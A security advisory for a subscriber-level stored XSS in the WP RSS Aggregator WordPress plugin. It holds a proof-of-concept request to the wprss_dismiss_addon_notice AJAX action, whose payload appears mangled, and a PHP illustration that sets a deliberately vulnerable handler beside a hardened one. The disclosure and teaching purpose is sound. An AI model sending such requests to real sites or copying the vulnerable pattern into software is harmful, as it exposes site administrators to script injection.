wpvulndb - Krzysztof Zając - WPVDB-ID: 0742483B-6314-451B-A63A-536FD1E14845
History: Nov 29, 2021 - 12:00 a.m.

WP RSS Aggregator < 4.19.3 - Subscriber+ Stored Cross-Site Scripting

2021-11-29 00:00:00 - Krzysztof Zając - wpscan.com
5

EPSS: 0.001 (Low), Percentile: 21.3%

The plugin does not sanitise and escape data before outputting it in the System Info admin dashboard. Because the wprss_dismiss_addon_notice AJAX action lacks authorisation and CSRF checks, any authenticated user, such as a subscriber, can call it and store a malicious payload via the addon parameter, which leads to a Stored XSS issue.

PoC

fetch("https://example.com/wp-admin/admin-ajax.php?action=wprss_dismiss_addon_notice", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": "addon=&notice;=b",
  "method": "POST",
  "credentials": "include"
});

POST /wp-admin/admin-ajax.php?action=wprss_dismiss_addon_notice HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 56
Connection: close
Cookie: [any authenticated user]

addon=&notice;=b

The XSS will be triggered at https://example.com/wp-admin/admin.php?page=wpra_tools
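The advisory describes two missing controls on the AJAX action (no nonce check for CSRF, no capability check for authorisation) plus unescaped output of the stored value on an admin page. The PHP below is an added illustration of that vulnerability class beside its hardened form; it is not WP RSS Aggregator's code, and the hook name, option name, function names and the addon allow-list are invented for the example.

```php
<?php
/*
 * Hypothetical WordPress plugin code (not WP RSS Aggregator's own source).
 * It shows the vulnerability class from the advisory: an admin-ajax action
 * reachable by any logged-in user that stores a request parameter without
 * sanitisation, and an admin page that echoes it without escaping.
 * Hook, option and function names are made up for this illustration.
 */

/* --- Vulnerable pattern --------------------------------------------- */

// wp_ajax_* hooks fire for every authenticated user, subscriber included,
// so "the user is logged in" is not an authorisation check.
add_action( 'wp_ajax_example_dismiss_addon_notice', 'example_dismiss_addon_notice_vulnerable' );

function example_dismiss_addon_notice_vulnerable() {
    // No nonce check (CSRF) and no capability check (authorisation).
    $addon     = $_POST['addon'];                  // raw, unsanitised input
    $dismissed = get_option( 'example_dismissed_addon_notices', array() );
    $dismissed[] = $addon;                         // stored as-is
    update_option( 'example_dismissed_addon_notices', $dismissed );
    wp_die();
}

function example_render_system_info_vulnerable() {
    foreach ( get_option( 'example_dismissed_addon_notices', array() ) as $addon ) {
        echo '<li>' . $addon . '</li>';            // unescaped output: stored XSS
    }
}

/* --- Hardened pattern ----------------------------------------------- */

add_action( 'wp_ajax_example_dismiss_addon_notice_safe', 'example_dismiss_addon_notice_safe' );

function example_dismiss_addon_notice_safe() {
    // CSRF: the request must carry a nonce issued for this specific action.
    check_ajax_referer( 'example_dismiss_addon_notice', '_ajax_nonce' );

    // Authorisation: dismissing admin notices is an administrator task.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Input validation: accept only known addon slugs (constructed allow-list).
    $allowed = array( 'example-addon-a', 'example-addon-b' );
    $addon   = isset( $_POST['addon'] ) ? sanitize_key( wp_unslash( $_POST['addon'] ) ) : '';
    if ( ! in_array( $addon, $allowed, true ) ) {
        wp_send_json_error( 'unknown addon', 400 );
    }

    $dismissed = get_option( 'example_dismissed_addon_notices', array() );
    if ( ! in_array( $addon, $dismissed, true ) ) {
        $dismissed[] = $addon;
        update_option( 'example_dismissed_addon_notices', $dismissed );
    }
    wp_send_json_success();
}

function example_render_system_info_safe() {
    foreach ( get_option( 'example_dismissed_addon_notices', array() ) as $addon ) {
        // Escape on output even though input is validated: values stored
        // before the fix, or written by another code path, may not have been.
        echo '<li>' . esc_html( $addon ) . '</li>';
    }
}

// The matching client request must include the nonce, e.g. a value produced by
// wp_create_nonce( 'example_dismiss_addon_notice' ) sent as the _ajax_nonce field.
```

Each of the three controls closes a different gap: the nonce stops a forged cross-site request, the capability check stops a low-privilege account from reaching the action at all, and output escaping keeps a value that was stored by any path from being interpreted as markup. Applying only one of them would leave the other two paths described in the advisory open.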

CPE Name            Operator   Version
wp-rss-aggregator   lt         4.19.3

